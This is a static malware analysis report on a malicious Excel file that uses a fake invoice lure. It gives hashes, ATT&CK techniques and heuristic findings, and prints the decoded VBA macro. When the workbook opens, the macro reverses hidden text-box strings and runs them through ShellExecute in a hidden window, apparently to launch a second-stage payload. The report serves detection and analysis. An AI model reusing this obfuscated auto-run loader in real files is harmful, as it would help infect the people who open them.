Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bdf3db2c6c057f5…

MALICIOUS

Office (OLE)

264.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-06-28
MD5: 813d297d4059025093843cabe7bc2b5d SHA-1: b93ec1f412b81c408f565cce6ade8b149f8b3643 SHA-256: 6bdf3db2c6c057f525b5d1dc7265270b0904a5f7a364bf1145851970a7a4309b
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The document contains VBA macros that leverage the `Shell.Application` object to execute commands. The heuristic firings indicate a reference to `ShellExecute` and the presence of VBA macros, along with a fake invoice lure. The script's primary function is to execute a command constructed from text boxes within the document, likely to download and run a second-stage payload.

Heuristics 4

  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
    tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1314 bytes
SHA-256: 5876905b812d9423644ee868c6bf0af0b9b177461037e8431492f38e9e8592bb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()

Dim fGOzlqhZXccU, mNnDRGQmct, fgfyh, NGFPAxqkmttRDiX

Set mNnDRGQmct = ThisWorkbook.Sheets.Item(1)


With mNnDRGQmct

fGOzlqhZXccU = .TextBoxes("TextBox 1").Text

t7gh0 = .TextBoxes("TextBox 2").Text

End With


fgfyh = yMVumusAfyHAAMsz(fGOzlqhZXccU, t7gh0)
End Sub

Function yMVumusAfyHAAMsz(fgfjhfgfg, fjkerooos)
Dim tqsOfhbtsWwINQQzouSY

Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0

End Function



Function cozBWQucK(s)
  Dim p
  For p = Len(s) To 1 Step -1
      cozBWQucK = cozBWQucK & Mid(s, p, 1)
  Next
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True